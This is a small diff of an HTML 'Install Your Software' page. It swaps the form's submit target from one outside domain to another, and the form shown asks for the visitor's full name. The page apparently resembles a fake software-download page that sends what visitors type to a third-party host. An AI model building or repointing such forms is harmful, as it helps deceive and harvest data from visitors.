--- a/install.html
+++ b/install.html
@@ -355,7 +355,7 @@
 
   <div class="install-form">
     <p class="title">Install Your Software</p>
-    <form action="https://i-downloadsoftwares.com/error" method="post">
+    <form action="https://softwareinstaller.net/error.html" method="post">
       <div class="form-group">
         <label for="full-name">Full Name</label>
         <input type="text" id="full-name" name="full_name" placeholder="Enter your name" required />
